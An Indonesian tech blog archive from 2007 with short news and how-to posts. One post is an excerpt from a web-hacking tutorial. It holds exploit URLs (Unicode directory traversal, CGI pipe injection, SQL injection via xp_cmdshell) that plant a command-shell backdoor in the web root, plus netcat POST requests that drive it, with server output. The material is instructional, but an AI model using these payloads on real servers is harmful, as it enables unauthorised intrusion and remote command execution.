“My Computer Information” pada Help and Support Windows XP memungkinkan Anda untuk melihat status hardware dan software komputer, dan untuk mengumpulkan informasi help dan troubleshooting. Untuk melihat My Computer Information, di bawah Pick a task, klik Use Tools view your computer information and diagnose problems. Di bawah Tools, klik My Computer Information, dan kemudian ikuti instruksi yang ditampilkan pada layar. Pada tabel, Anda bisa melihat jenis informasi yang tersedia. Untuk informasi lebih lanjut tentang My Computer Information, lihat Help and Support Center Windows XP.

Windows Update

Windows Update merupakan perluasan online dari Windows yang membantu Anda supaya komputer tetap up-to-date. Microsoft menyediakan update penting, yang meliputi sekuriti dan update kritikal lainnya, untuk membantu melindungi komputer Anda dari virus baru dan ancaman sekuriti lainnya, yang tersebar melalui Internet atau jaringan. Update lain berisi pengembangan, seperti upgrade dan tool yang membantu computer Anda supaya bisa berjalan lancar. Windows Update mengecek komputer dan menyediakan beragam pilihan update yang sesuai dengan software, dan hardware komputer Anda. Untuk membuka Windows Update, klik Start, klik All Programs, dan kemudian klik Windows Update. Kali pertama Anda mengunjungi situs web Windows Update, klik Yes pada waktu diminta untuk meng instalasi setiap software atau kontrol yang dibutuhkan. Pada home page Windows Update, klik Scan for Available Updates untuk mencari update yang tersedia.

_ http://support.microsoft.com/ kb/300415/en-us

_ http://support.microsoft.com/ kb/308920/en-us

_ http://support.microsoft.com/ kb/322275

Speed Up Your PC

Mempercepat Kinerja Komputer

Beberapa orang bertanya pada saya , " Saya sudah memiliki RAM yang cukup besar tapi kok kalah cepat ya dengan PC anda yang RAM nya hanya 256 MB ". Di rumah saat ini saya memang masih menggunakan spesifikasi berikut :

1. Processor Pentium IV 1,7 GHz
2. DDR RAM 256 MB
3. VGA 32 MB


Bagi anda mungkin spesifikasi komputer saya , sangat lamban apalagi untuk saya yang berprofesi sampingan sebagai Web Development.Untuk internal server spesifikasi saya cukup mengganggu pekerjaan saya. Tapi , saya katakan tidak demikian . Saya sudah membuat supaya komputer saya mampu bekerja lebih cepat dan Optimal dengan spesifikasi yang demikian.

Bagaimana cara nya ?!?!

Saya hanya berpikir seperti ini : pada saat komputer StartingUp ada beberapa system yang dipanggil untuk melakukan proses2 tertentu , contoh nya anda menginstallasi Game Online.Secara otomatis akan ada file executable yang dipanggil pada saat Booting ( prosesStartingUp ). Semakin banyak executable file yang dipanggil semakin lama proses StartingUp nya.Setelah StartingUp selesai tentu saja file executable tersebut tetap bekerja mengikuti proses yang berjalan, bukankah dengan demikian itu menjadi suatu beban tambahan bagi RAM dalam meng-alokasikan data yang akan diproses? Ini masalah pertama pada saat Booting.



Saturday, September 8, 2007

Koneksi Satelit vs Serat Optik

Koneksi Satelit Lebih Mahal Ketimbang Serat Optik


Denpasar - Koneksi satelit untuk sistem online di sektor perbankan dan industri keuangan lainnya dinilai masih terlalu mahal bila dibandingkan dengan menggunakan koneksi serat optik.

CEO Biznet Adi Kusma berpendapat, selain biaya yang dikeluarkan lebih ekonomis, penggunaan koneksi serat optik diyakini lebih efisien bagi bank dalam melayani nasabah.

"Karena serat optik lebih reliable dibandingkan media lainnya" ujarnya dalam keterangan tertulis yang diterima Jumat (7/9/2007).

Melihat potensi itu, Biznet selaku penyedia jaringan dan layanan internet berbasis serat optik, mulai membidik industri keuangan seperti perbankan, sekuritas, bursa, content provider keuangan dan lembaga asuransi, agar mau menggunakan produknya, FinanceNET.

"Layanan ini memungkinkan mereka untuk terhubungkan dengan kantor cabang mereka yang tersebar di seluruh dunia," klaim Adi. Menurutnya, hal itu sangat memungkinkan karena Biznet menggunakan teknologi Resilent Packet Ring (RPR), di mana teknologi RPR dapat dilalui data hingga 1 Gigabyte dan tahan terhadap cuaca seperti hujan. "Sehingga, kestabilan transmisi data pada jaringan dapat terpelihara dengan dengan baik," kata Adi.

Keunggulan lainnya, lanjut dia, teknologi RPR dapat melakukan pengalihan rute pengiriman data secara otomatis jika terjadi insiden pemotongan kabel (Fiber Cut).

Adi mengatakan, saat ini Biznet telah hadir di 120 Gedung. Angka itu, kata dia, akan terus meningkat sehingga pihak perbankan akan dapat lebih mudah memanfaatkannya.

"Sekitar 80 persen pelanggan Biznet merupakan perusahaan bisnis yang beragam mulai dari Small Office Home Office (SOHO) hingga Multi National Corporation (MNC). Dari jumlah itu, didominasi perusahaan asing," tukasnya.

Source : detikInet

Thursday, August 16, 2007

Patch Baru Microsoft

Sembilan Patch Keamanan Terbaru dari Microsoft


Image Seattle, 14 Agustus 2007 - Microsoft Corp mengeluarkan patch-patch baru untuk mengatasi sembilan celah keamanan krusial yang ditemukan pada sistem mereka. Termasuk empat patch untuk mencegah hacker jahat masuk ke dalam komputer pengguna melalui halaman web.

Microsoft memberikan rating “kritis” pada empat patch terbaru yang berkaitan dengan aktivitas browsing web. Update ini berdampak pada beberapa versi Windows, Server, dan Office, termasuk di dalamnya Windows XP dan Windows Vista. Ke empat patch ini dimaksudkan untuk mencegah infiltrasi hacker ke dalam komputer pengguna melalui website khusus.

Dua update kritis lainnya ditargetkan untuk menutup lubang keamanan yang terdapat pada spreadsheet Excel. Selain itu update ini juga ditujukan untuk aplikasi-aplikasi yang memungkinkan pengguna untuk membuka image dari dalam e-mail ataupun sebuah website.

Meskipun para pembuat aplikasi menyatakan bahwa Windows Vista adalah sistem operasi yang paling aman saat ini, namun, pada kenyataannya salah satu patch penting yang dikeluarkan oleh Microsoft ini memperbaiki lubang keamanan pada aplikasi “Gadgets” yang ada di Vista. Salah satu fungsi Gadgets ini adalah mengirimkan berita-berita terbaru melalui sebuah RSS (Really Simple Syndication) Feeds.

Pengguna yang mendaftar pada sebuah RSS Feed jahat, menambah daftar kontak gadungan, atapun mengklik link palsu akan membuka pintu bagi seorang hacker jahat untuk masuk ke dalam sistem mereka.

Patch penting lainnya terkait dengan penutupan lubang keamanan pada Windows Media Player dan juga aplikasi yang memungkinkan pengguna untuk menjalankan komputer virtual pada PC mereka.

Menurut Amol Sarwate, Manager dari pusat penelitian keamanan dari perusahaan Qualys, “Hackers semakin sering mencari cara untuk menyerang pengguna biasa melalui suatu halaman web”.

“Apa yang kita hadapi sekarang ini adalah pelopor baru dalam serangan berbasis web melalui file gambar, skin media player, gadget dan titik lainnya yang berhubungan dengan web,” tambah Sarwate.

Menurutnya, Staff IT pada perusahaan-perusahaan besar sudah semakin sadar dan siap dalam mengatasi permasalahan keamanan pada saat mereka menjalankan aplikasi server. Oleh karena itu, para penyerang memfokuskan diri pada kelengahan pengguna biasa terhadap keamanan komputer mereka.

Pengguna Windows dapat mengunjungi Website Sekuriti Windows untuk mendapatkan update-update ini. Mereka juga dapat mengkonfigurasi komputer mereka untuk melakukan update otomatis setiap bulannya.


Source: Yahoo News

Monday, August 13, 2007

CCTV Awasi Jakarta

Jakarta, Sejumlah titik rawan dan tempat strategis di DKI Jakarta telah diawasi kamera closed-circuit television (CCTV). Dari 160 kamera yang direncanakan, 100 di antaranya telah beroperasi dan dikendalikan operator Crisis Center DKI Jakarta.

Sebanyak 25 operator yang berasal dari Dinas Trantib akan berkoordinasi dengan seluruh dinas di lingkungan Pemprov DKI dalam proses pemberian informasi.

Mereka dilatih langsung oleh guru-guru dari sekolah tinggi pemadam kebakaran Prancis.

"Saya bangga dan berterimakasih pada Prancis yang telah memberi sarana, prasarana dan teknologi canggih. Diharapkan kita bisa hadapi bencana besar," kata Sekretaris Daerah Pemprov DKI Ritola Tasmaya.

Hal itu dia sampaikan saat menutup pelatihan operator pengendali operasional penanggulangan bencana di Crisis Center Penanggulangan Bencana, Gedung Balaikota, Jl Medan Merdeka Selatan, Jakarta Pusat, Jumat (10/8/2007).

Sebelumnya, RI dan Prancis telah menandatangani MoU untuk penguatan kapasitas manajemen kebencanaan. Pemerintah Prancis memberi bantuan peralatan. Antara lain berupa alat komunikasi yang memiliki fungsi berlapis, seperti internet dan telepon satelit.

"Total seluruhnya dana yang dikeluarkan 5 juta euro untuk 7 lokasi," kata International Project Manager Civipol Counsel, Bruno Maestracci.

Ketujuh wilayah itu meliputi Jakarta (Bakornas dan Balaikota), Padang dan Banda Aceh. 3 Kota yang akan menyusul Jambi, Bali, dan Yogyakarta.



Source : DetikInet

Robot Jepang

Robot berdansa (cvl.iis.u-tokyo.ac.jp)

Tokyo, Di Jepang, perkembangan robot memang cukup pesat. Mulai dari robot pembantu hingga robot pengganti dokter. Kini, robot yang mampu berdansa pun hadir.

Para ilmuwan dari University of Tokyo telah berhasil menciptakan robot yang bisa mengikuti gerakan penari manusia. Ya, robot yang bisa berdansa seperti layaknya manusia.

Pembuatan robot HRP-2 bipedal yang bisa berdansa tersebut digagas oleh Shin'ichiro Nakaoka dan dibantu oleh rekan-rekan dari universitas Tokyo. Teknologi yang digunakan adalah teknologi penangkap gerakan, sehingga gerakan dansa seseorang bisa terekam dan segera diikuti oleh sang robot.

Walau kemampuan robot itu bisa dikatakan tidak meragukan, namun ada beberapa hal yang menjadi problem. Yaitu mem-program sang robot agar tetap dapat mengikuti gerakan yang sulit namun dengan keseimbangan yang tetap baik.

Seperti dilansir Vnunet , tak lama lagi, dunia akan menyaksikan robot tersebut menari tarian balet 'Swan Lake'. Namun, menurut para ilmuwan, robot ini tidak bisa mengikuti melakukan balet yang seringkali loncat dan membiarkan kedua kakinya di udara beberapa kali.

Hingga saat ini, robot tersebut telah didemonstrasikan dan menari tarian tradisional Jepang, 'Aizu-Bandaisan' yang banyak mengunakan gerakan badan daripada kaki



Source : DetikInet

Thursday, August 9, 2007

Hacking ( 2 )

2.0 Flowchart for a one-way web hack

Consider the example where an attacker finds a vulnerable web application, and is able to exploit it using techniques such as the ones mentioned previously. The attacker has achieved arbitrary command execution, but due to the restrictive firewall, is unable to proceed further into the network. To make an attack effective, two things are essential:

  1. Interactive terminal access - for running commands to pilfer the attacked server or penetrate further into the network.
  2. File transfer access - for transferring attack tools such as port scanners, rootkits, etc.
A tight firewall can make it very difficult to achieve the above objectives, however, it is not impossible. To get around these restrictions, with a little bit of web application programming knowledge, we can create a web based command prompt and a file uploader.

Before proceeding further we shall take a preview of the various stages of the one-way hack, as illustrated by the following diagram:

3.0 Finding the entry point

The one-way hack begins when we are able to achieve remote command execution on the target web server. We can use any of the common techniques used to attack web servers. We shall present a few examples of various ways of achieving remote command execution based on different types of URL mappings as described previously. A detailed discussion on web server and application vulnerabilities is beyond the scope of this paper.

Our objective is to create a backdoor by moving the shell interpreter (/bin/sh, cmd.exe, etc) to an area within the web server's document root. This way, we can invoke the shell interpreter through a URL. We present three examples which illustrate how to create backdoors using various exploitation techniques.

The diagram below illustrates some of the techniques used to find an entry point:

3.0.1 Exploiting URL parsing

The Unicode / Double decode attack is a classic example of a URL parsing vulnerability. The URL below copies the command interpreter - cmd.exe - into the "scripts/" directory within the web server's document root:

http://www1.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+
c:\winnt\system32\cmd.exe+c:\inetpub\scripts

3.0.2 Exploiting poorly validated input parameters

In this example, an unchecked parameter is passed from the URL to a Perl CGI script news.cgi using the open() call in an insecure manner:

http://www2.example.com/cgi-bin/news.cgi?story=101003.txt|cp+/bin/sh+
/usr/local/apache/cgi-bin/sh.cgi|

The shell (/bin/sh) gets copied into the cgi-bin directory as sh.cgi.

3.0.3 Exploiting SQL injection

Here, we show how SQL injection can be used to invoke a stored procedure on a database server, and run commands via the stored procedure:

http://www3.example.com/product.asp?id=5%01EXEC+master..xp_cmdshell+
'copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\'

3.1 Invoking the command interpreter

Our objective of creating a backdoor by moving the command interpreter or the shell into the web document root is to be able to invoke it remotely over HTTP. The HTTP POST method is best suited for this purpose. Using POST, the input data gets passed to the invoked resource over standard input, and the web server returns the output generated by standard output back over the HTTP connection.

We shall illustrate how to send commands to command interpreters over POST, with two examples - one for CMD.EXE on IIS and Windows NT and the other for sh.cgi (which is a copy of /bin/sh) on Apache and Linux.

3.1.1 POSTing commands to CMD.EXE

The example below shows two commands being run with CMD.EXE, which is accessible on http://www1.example.com/scripts/cmd.exe. The POST request is shown in blue letters.

$ nc www1.example.com 80
POST /scripts/cmd.exe HTTP/1.0
Host: www1.example.com
Content-length: 17

ver
dir c:\
exit


HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:13:19 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>ver

Windows NT Version 4.0

C:\Inetpub\scripts>dir c:\
Volume in drive C has no label.
Volume Serial Number is E43A-2A0A

Directory of c:\

10/04/00 05:28a WINNT
10/04/00 05:31a Program Files
10/04/00 05:37a TEMP
10/04/00 07:01a Inetpub
10/04/00 07:01a certs
11/28/00 05:12p software
12/06/00 03:46p src
12/07/00 12:50p weblogic
12/07/00 12:53p weblogic_publish
12/07/99 01:11p JavaWebServer2.0
12/07/99 06:49p 134,217,728 pagefile.sys
12/07/99 07:24a urlscan
12/07/99 04:55a Netscape
13 File(s) 134,217,728 bytes
120,782,848 bytes free

C:\Inetpub\scripts>exit
$

Some care needs to be taken in order for CMD.EXE to receive the commands properly, and for the web server to return the output of CMD.EXE properly. In the above example, we have included the "exit" command to ensure that the input stream to CMD.EXE terminates properly. The Content-length of the POST request is also calculated accordingly, keeping in mind the extra characters taken by "exit"

3.1.2 POSTing commands to /bin/sh

The example below shows three commands being run with /bin/sh, which is accessible on http://www2.example.com/cgi-bin/sh.cgi. The POST request is shown in bold letters.

$ nc www2.example.com 80
POST /cgi-bin/sh.cgi HTTP/1.0
Host: www2.example.com
Content-type: text/html
Content-length: 60


echo 'Content-type: text/html'
echo
uname
id
ls -la /
exit


HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:47:20 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html

Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x 19 root root 4096 Feb 2 2002 .
drwxr-xr-x 19 root root 4096 Feb 2 2002 ..
drwxr-xr-x 2 root root 4096 Jun 20 2001 bin
drwxr-xr-x 2 root root 4096 Nov 28 02:01 boot
drwxr-xr-x 6 root root 36864 Nov 28 02:01 dev
drwxr-xr-x 29 root root 4096 Nov 28 02:01 etc
drwxr-xr-x 8 root root 4096 Dec 1 2001 home
drwxr-xr-x 4 root root 4096 Jun 19 2001 lib
drwxr-xr-x 2 root root 16384 Jun 19 2001 lost+found
drwxr-xr-x 4 root root 4096 Jun 19 2001 mnt
drwxr-xr-x 3 root root 4096 Feb 2 2002 opt
dr-xr-xr-x 37 root root 0 Nov 28 2003 proc
drwxr-x--- 9 root root 4096 Feb 9 2003 root
drwxr-xr-x 3 root root 4096 Jun 20 2001 sbin
drwxrwxr-x 2 root root 4096 Feb 2 2002 src
drwxrwxrwt 7 root root 4096 Nov 28 02:01 tmp
drwxr-xr-x 4 root root 4096 Feb 2 2002 u01
drwxr-xr-x 21 root root 4096 Feb 2 2002 usr
drwxr-xr-x 16 root root 4096 Jun 19 2001 var
$

The care and feeding of /bin/sh over Apache is slightly different. Apache expects a well formed HTTP response header from all its CGI programs, hence we have to prepend the lines "Content-type: text/html" in the output. The two "echo" commands are for this purpose.

3.1.3 Automating the POST process

We have created two Perl scripts post_cmd.pl and post_sh.pl to automate the task of preparing the proper POST requests for the commands and sending them to the web server. The syntax for invoking post_cmd.pl is as follows:

usage: post_cmd.pl url [proxy:port] <>

post_cmd.pl is written such that it can tunnel the POST requests over an HTTP proxy server as well. post_sh.pl is on similar lines.

The examples below show the same results being derived using the Perl scripts instead of forming our own POST requests:

Output of post_cmd.pl

$ ./post_cmd.pl http://www1.example.com/scripts/cmd.exe
ver
dir c:\
^D

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:05:46 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>ver

Windows NT Version 4.0

C:\Inetpub\scripts>dir c:\
Volume in drive C has no label.
Volume Serial Number is E43A-2A0A

Directory of c:\

10/04/00 05:28a WINNT
10/04/00 05:31a Program Files
10/04/00 05:37a TEMP
10/04/00 07:01a Inetpub
10/04/00 07:01a certs
11/28/00 05:12p software
12/06/00 03:46p src
12/07/00 12:50p weblogic
12/07/00 12:53p weblogic_publish
12/07/99 01:11p JavaWebServer2.0
12/07/99 06:49p 134,217,728 pagefile.sys
12/07/99 07:24a urlscan
12/07/99 04:55a Netscape
13 File(s) 134,217,728 bytes
120,782,848 bytes free

C:\Inetpub\scripts>exit
$

Output of post_sh.pl

$ ./post_sh.pl http://www2.example.com/cgi-bin/sh.cgi
uname
id
ls -la /
^D

HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:43:54 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html

Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x 19 root root 4096 Feb 2 2002 .
drwxr-xr-x 19 root root 4096 Feb 2 2002 ..
drwxr-xr-x 2 root root 4096 Jun 20 2001 bin
drwxr-xr-x 2 root root 4096 Nov 28 02:01 boot
drwxr-xr-x 6 root root 36864 Nov 28 02:01 dev
drwxr-xr-x 29 root root 4096 Nov 28 02:01 etc
drwxr-xr-x 8 root root 4096 Dec 1 2001 home
drwxr-xr-x 4 root root 4096 Jun 19 2001 lib
drwxr-xr-x 2 root root 16384 Jun 19 2001 lost+found
drwxr-xr-x 4 root root 4096 Jun 19 2001 mnt
drwxr-xr-x 3 root root 4096 Feb 2 2002 opt
dr-xr-xr-x 37 root root 0 Nov 28 2003 proc
drwxr-x--- 9 root root 4096 Feb 9 2003 root
drwxr-xr-x 3 root root 4096 Jun 20 2001 sbin
drwxrwxr-x 2 root root 4096 Feb 2 2002 src
drwxrwxrwt 7 root root 4096 Nov 28 02:01 tmp
drwxr-xr-x 4 root root 4096 Feb 2 2002 u01
drwxr-xr-x 21 root root 4096 Feb 2 2002 usr
drwxr-xr-x 16 root root 4096 Jun 19 2001 var
$
In this manner, we can issue multiple commands to the target web server using HTTP POST requests. This concept shall be used to create arbitrary files on the web server, as discussed in section 4.1

Friday, June 22, 2007

Perhimpunan Nama Domain Indonesia

Guna meningkatkan penggunaan nama domain .id di Indonesia, sejumlah komunitas teknologi
informasi (TI) Indonesia membentuk Perhimpunan Nama Domain Indonesia (PANDI).Teddy Sukardi, Ketua Pengurus PANDI menjelaskan bahwa lembaga nirlaba yang diketuainya terdiri dari sejumlah komunitas TI, akademisi dan pratikisi TI. Lembaga ini bertujuan untuk mengelola pendaftaran nama domain di Indonesia.

Alasan pembentukan lembaga yang diresmikan notaris pada 29 Desember 2006 ini, menurut Teddy adalah untuk mengurangi ketergantungan pengguna internet Indonesia akan domain asing."PANDI ingin memulainya bersama dengan komunitas melalui pengunaan domain .id, yang nantinya akan banyak berguna membangun domain Indonesia, jadi tidak terlalu ketergantungan dengan luar negeri," ujar Teddy ketika dihubungi detikINET, Jumat petang (29/12/2006).

Ketergantungan terhadap domain asing, menurut dia bisa dilihat dari kejadian akhir-akhir
ini. Akibat terputusnya koneksi internasional, maka banyak pengguna internet Indonesia yang
terganggu aktifitasnya karena mengandalkan koneksi internasional, tambah Teddy. Penyelesaian sengketa atas perebutan nama domain juga menjadi tujuan pembentukan PANDI.
Nantinya pemberian nama domain akan lebih diseleksi secara lebih ketat. "Jadi pertimbangannya tidak hanya karena mereka duluan, tetapi juga harus dilihat alasan mereka
memilih nama domain tersebut, dan pendaftar juga harus mempunyai NPWP (Nomor Pajak Wajib Pajak)," papar Teddy.

Sebelumnya pengelolaan domain .id diatur pemerintah melalui Departemen Komunikasi dan
Informatika (Kominfo). Namun menurut Teddy, pengelolaan yang dipegang oleh pemerintah
dirasa kurang normal, karena tidak sesuai dengan ketentuan pada Keputusan Menteri No 21
tahun 2001 yang menyatakan bahwa penyelenggaraan nama domain haruslah lembaga nirlaba dan bersifat independen.

Saat ini, menurut Teddy tercatat sudah ada sekitar 30.000 nama domain .id, dengan
penambahan tiap tahunnya mencapai 2.000 sampai 4.000 pendaftar. Tentu saja ini dirasa masih sangat kurang, jika dibandingkan dengan jumlah pengguna internet Indonesia yang sekarang mencapai 20 juta.

Maka untuk menjaring peminat, PANDI akan menggratiskan biaya pendaftaran dan biaya
perpanjangan sampai akhir Maret tahun 2007. Sedangkan untuk selanjutnya PANDI masih belum menentukan berapa biaya yang harus dikeluarkan untuk mendapatkan nama domain .id ini.

Tuesday, June 19, 2007

Indonesia Hacking Competition

Pazia - Acer National Hacking Competition 2 akan segera diselenggarakan di sepuluh kota Indonesia dengan hadiah utama Notebook Acer Ferrari 1005, piala bergilir PANHAC, voucher training dan ujian bersertifikasi FORTINET, untuk pemenang kedua Acer LCD Monitor 17″ dan pemenang ketiga Samsung MFP Laser Printer SCX-4521.

Untuk disetiap kota, akan ada satu pemenang dengan hadiah Notebook Acer Aspire 5052.

Selain kompetisi di sepuluh kota, juga diselenggarakan kompetisi PANHAC2 Online yang diselenggarakan sebelum kompetisi di kota yang bersangkutan berjalan, pukul 14.30 - 15.00 WIB pada jadwal PANHAC2.

Kompetisi PANHAC2 Online dapat diikuti dengan cuma-cuma, tetapi berhadiah Acer LCD monitor 19”, Samsung Laser Printer ML-2010 dan Samsung Laser Printer ML-1610.

Seperti tahun lalu, PANHAC2 juga menggelar pertandingan untuk merebut file yang disimpan di dalam server lokal.

Selain PANHAC2 offline dan online, PANHAC2 ini juga menyelenggarakan Kompetisi Penulisan Artikel Hacking dan Teknologi Informasi untuk para
wartawan, editor dan penulis lepas yang juga berhadiah satu Notebook Acer Aspire 5052.

Informasi selengkapnya sebagai berikut:

Jadwal acara PANHAC2:

  • Di kota-kota selain Jakarta: pk. 12.00 - 18.00
  • Jakarta pk. 09.00 - 12.00
  • Grand Final - Jakarta pk 12.00 - 18.00

Sususan Acara:

  • Registrasi peserta
  • Sambutan Penyelenggara: ACER dan pendukung: FORTINET
  • Online Hacking Competition
  • Keynote Speaker: Perkembangan Hacking di Indonesia
  • Teknis dan implementasi kompetisi
  • Hacking Competition
  • Penentuan juara dan penyerahan hadiah

Tim Pengarah:

  • Dani Firman Syah (Xnuxer)
  • Toto Atmojo (To2)
  • MA Rody Candera (Odyxb)

Juri:

  • Michael Sunggiardi (Praktisi Komputer)
  • Dani Firman Syah (Xnuxer)
  • PT Pazia Pillar Mercycom

Persyaratan PANHAC2 - 2007

  1. Peserta bisa perorangan maupun team (terdiri dari maksimal 2 orang).
  2. Biaya pendaftaran perorangan Rp 50.000,- dan team Rp 100.000,-
  3. Peserta yang tidak membawa notebook dapat menggunakan notebook ACER 5052 series yang sudah disediakan Panitia.
  4. Peserta diperbolehkan mengikuti kompetisi menggunakan notebook yang dibawa sendiri dengan model ACER Aspire Notebook, ACER Ferrari Notebook. Jika notebook yang digunakan bukan merk tersebut, dikenakan tambahan biaya Rp 100.000 di luar biaya pendaftaran.
  5. Kompetisi nasional ini berhadiah ACER Aspire Notebook 5052 series untuk pemenang pertama di tiap kota yang akan diundang mengikuti Grand Final di Jakarta dengan akomodasi perjalanan ditanggung panitia.
  6. Pemenang pertama Grand Final memperebutkan ACER Ferrari 1005 series, piala bergilir PANHAC2, voucher training dan ujian bersertifikasi FORTINET. Hadiah Acer LCD Monitor 17” untuk pemenang kedua. Samsung MFV Laser Printer SCX-4521 untuk pemenang ketiga.
  7. Keputusan juri adalah mutlak dan tidak dapat diganggu gugat.
  8. Aturan lengkap akan disertakan kepada semua peserta pada hari kompetisi.
  9. Semua peserta akan mendapatkan makan siang, kaos dan sertifikat keikutsertaan.

Persyaratan Kompetisi Online

  1. Pendaftaran kompetisi online akan di buka mulai tanggal 24 Juni 2007.
  2. Peserta melakukan registrasi online ke http://panhac.marveltechnology.com disertai data sesuai KTP/SIM/Passport, no. telepon kantor/rumah, nomor seluler.
  3. Peserta diharuskan melakukan aktivasi setelah proses registrasi online. Kode aktivasi secara otomatis dikirim ke email peserta setelah registrasi.
  4. Tata tertib kompetisi online akan dikirimkan secara otomatis kepada peserta yang terdaftar setelah perserta melakukan proses aktivasi melalui email.
  5. Account peserta dapat digunakan pada setiap jadwal kompetisi online di tiap kota.
  6. Jadwal kompetisi online selain Jakarta, yaitu pada pk 14.30 – 15.00 WIB. Jadwal kompetisi online di Jakarta pk. 10.30 – 11.00 WIB. Harap setiap peserta yang berada pada wilayah waktu WITA dan WIT menyesuaikan pada WIB. Secara otomatis server offline di luar jadwal tersebut.
  7. Pada saat kompetisi online berlangsung peserta harus log in terlebih dahulu ke http://panhac.marveltechnology.com
  8. Rating hasil sementara kompetisi online akan ditampilkan di http://panhac.marveltechnology.com pada hari berikutnya setelah setiap jadwal terselenggara.
  9. Akan dipilih tiga orang pemenang kompetisi online dari tiga nilai tertinggi yang ditentukan berdasarkan hasil monitoring dan analisa tim juri.
  10. Pengumuman pemenang kompetisi online akan dilakukan pada 01 Agustus 2007, pk 12.00 WIB melalui http://panhac.marveltechnology.com
  11. Pemenang kompetisi online akan diundang langsung pada waktu tersebut melalui telepon/SMS untuk mengikuti Grand Final di Jakarta pada 01 Agustus 2007, dengan akomodasi perjalanan ditanggung panitia.
  12. Kompetisi online berhadiah Acer LCD monitor 19’’, Samsung Laser Printer ML-2010 dan Samsung Laser Printer ML-1610.
  13. Kompetisi online ini tidak dipungut biaya registrasi.
  14. Keputusan juri adalah mutlak dan tidak dapat diganggu gugat.
  15. Peserta wajib mentaati peraturan yang tertulis pada tata-tertib kompetisi online.

Jadwal PANHAC 2007 di 10 kota

  • Medan 26 Juni, Universitas HKBP Nommensen
    • Juliana. FOCUS. 061-7330800
  • Padang 28 Juni, Ruang Serba Guna - Universitas Negeri Padang
    • Butet. VENES JAYA. 0751-37040, 30583
  • Bandung 03 Juli, Bandung Elektronik Mall. LG Floor
    • Patrick, Susan. 3G Gallery. 022-70010708
  • Semarang 07 Juli, Plasa Simpang Lima. Hall BIMA - Lt. 1
    • Nila, Icha. WAHANA KOMPUTER. 024-8413238
  • Jogja 10 Juli, UAJY. Auditorium Kampus Bonaventura - Lt. 4
    • Kristina. WIRABUANA KOMPUTER. 0274 - 560891, 560892
  • Surabaya 12 Juli, Tunjungan Elektonik Mall.
    • Andy, David, Cahyo. APKOMINDO JATIM. 031-5018843
  • Bali 17 Juli, SMKN1 Denpasar
    • Juniasih, Maria. BALISOFT. 0361-418050, 7424494
  • Lampung 21 Juli, UNIVERSITAS NEGERI LAMPUNG
    • Yuli. MULTICOM. 0721-255888
  • Makassar 24 Juli, MTC Karebosi.
    • Elsa. FLASH Computer. 0411-857888
    • Nazarus. PROTON. 0411-310746
  • Jakarta 01 Agt, Mangga Dua Mall. LG Floor
    • Sary. PT MARVEL. 021-62311510
    • Laila. PT PAZIA. 021-62313117

Pers Conference

Kota

Waktu

Tempat (dalam konfirmasi)

Medan

Senin, 30 Apr

14.00 – 16.15

Universitas HKBP Nommensen

Padang

Kamis, 03 Mei

14.00 – 16.15

Universitas Negeri Padang

Semarang

Rabu,09 Mei

14.00 – 16.15

Wahana Komputer

Jogja

Jumat,11 Mei

09.00 – 11.15

Universitas Atmajaya

Lampung

Senin,14 Mei

10.00 – 12.15

Universitas Negeri Lampung

Bali

Senin, 21 Mei

14.00 – 16.15

Teuku Umar Garden Restoran

Makassar

Kamis, 24 Mei

14.00 – 16.15

MTC Karebosi

Jakarta

Selasa, 29 Mei

14.00 – 16.15

M2M *)

Surabaya

Kamis, 31 Mei

14.00 – 16.15

Sekretariat APKOMINDO.

Bandung

Kamis,07 Juni

14.00 – 16.15

Bandung E-tronical Mall

Acara Pers Conference PANHAC2 dan Kompetisi Penulisan Berita Tingkat Nasional dengan hadiah: 1 unit Notebook Acer Aspire 5052 series.

Tim Juri:

  • Rene L. Pattiradjawane (Redaksi Kompas)
  • Donny B.U (detikinet.com)

Kriteria penilaian:

  • Tulisan mencerminkan pemahaman tentang hacking dan PANHAC
  • Penyajian tulisan yang unik
  • Nilai tambah untuk berita yang diterbitkan lebih dari satu kali
Tulisan dikumpulkan berupa hardcopy dan terbitan di media, dikirim kepada Partner CEO di daerah, seperti yang tercantum pada jadwal PANHAC 10 kota. Softcopy dikirim ke email panitia: panhac@marvetechnology.com, segera setelah berita diterbitkan.

Pengumuman pemenang dan penyerahan hadiah akan dilakukan di Jakarta pada acara Grand Final PANHAC2, 01 Agustus 2007.